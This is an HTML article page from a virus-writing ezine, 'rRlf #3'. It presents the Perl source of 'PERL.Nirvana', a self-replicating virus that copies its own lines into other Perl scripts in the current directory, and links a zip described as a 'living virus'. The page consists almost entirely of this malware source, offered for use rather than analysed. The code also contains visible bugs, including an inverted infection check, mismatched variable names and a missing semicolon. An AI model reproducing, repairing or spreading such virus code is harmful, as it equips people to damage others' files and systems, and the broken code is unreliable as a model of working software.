<html>
<head>
<title>rRlf #3</title>
</head>
<body text="#ffffff" link="#ff0000" vlink="#ff0000" alink="#ff0000" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>The Revoluti0n</i>
<br><table cellpadding="9">
<tr>
<th><a href="25.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="27.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>PERL.Nirvana by Second Part To Hell</u></b>
<p><pre>
#!/usr/bin/perl
# Nirvana RuLeZ the world
# PERL.Nirvana
# by Second Part To Hell

# Thanks to SnakeByte for your tutorial!

open(file,$0);
@nirvana=<file>;
@nirvana=@nirvana[0...31]
close(file);

foreach $FileName (<*>)
{
  if ((-r $FileName) && (-w $FileName) && (-f $FileName))
  {
    open (File, "$FileName");
    @Lithium=<File>;
    close(File);
    if ((@Lithium[1] =~ "Nirvana") or (@Lithium[2] =~ "Nirvana"))
    {
      if((@Lithium[0] =~ "perl",,i) or (@Lithium[1] =~ "perl",,i))
      {
        open(sliver, ">$FileName");
	print sliver @Nirvana;
        print sliver @Litium;
        close (sliver);
      }
    }
  }
}
</pre>
<p><a href="26.zip">living virus</a>
</body>
</html>
